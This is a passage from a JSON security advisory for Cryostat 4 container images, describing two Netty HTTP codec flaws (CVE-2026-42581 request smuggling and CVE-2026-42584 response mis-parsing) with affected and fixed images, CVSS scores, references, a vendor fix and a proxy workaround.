"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477232"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s HttpObjectDecoder. A remote attacker can exploit this by sending a specially crafted HTTP/1.0 request that includes both `Transfer-Encoding: chunked` and `Content-Length` headers. While Netty correctly strips the conflicting `Content-Length` header for HTTP/1.1 messages, this guard is absent for HTTP/1.0. This can lead to HTTP request smuggling, where downstream proxies or handlers may misinterpret message boundaries, potentially allowing an attacker to bypass security controls or access unauthorized information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw. Netty\u0027s HttpObjectDecoder, used across various Red Hat products, improperly handles conflicting `Transfer-Encoding: chunked` and `Content-Length` headers in HTTP/1.0 requests. This allows a remote attacker to perform HTTP request smuggling, potentially bypassing security controls or gaining unauthorized access to information due to misinterpretation of message boundaries by downstream proxies or handlers.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "RHBZ#2477232",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477232"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42581",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42581"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9",
"url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9"
}
],
"release_date": "2026-05-13T17:54:44.492000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
},
{
"category": "workaround",
"details": "To mitigate this issue, configure any reverse proxies or load balancers in front of Netty to either reject HTTP/1.0 requests containing both Transfer-Encoding: chunked and Content-Length headers, or to explicitly prioritize the Transfer-Encoding header over Content-Length for HTTP/1.0 traffic. This ensures consistent interpretation of message boundaries and prevents request smuggling attacks.",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers"
},
{
"cve": "CVE-2026-42584",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-05-13T19:01:51.846351+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477224"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker could exploit this vulnerability by sending a specific sequence of HTTP responses (103, followed by a 200 with a GET body, then another 200 for a HEAD request) when the client pipelines GET then HEAD requests. This can cause the HttpClientCodec to incorrectly pair responses, leading to subsequent HTTP responses being parsed from the wrong offset. This issue may result in information disclosure or other data integrity problems due to misinterpretation of network traffic.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: A flaw in Netty\u0027s HttpClientCodec allows a remote attacker to cause data confusion. By sending a specially crafted sequence of HTTP responses, an attacker can cause subsequent HTTP responses to be parsed incorrectly, potentially leading to information disclosure or data integrity issues in applications utilizing Netty for HTTP client operations. This vulnerability affects various Red Hat products that bundle Netty, including Red Hat AMQ, Enterprise Application Platform, Red Hat Build of Quarkus, and Red Hat Build of Keycloak.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "RHBZ#2477224",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477224"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42584",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42584"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3",
"url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3"
}
],
"release_date": "2026-05-13T18:10:48.437000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
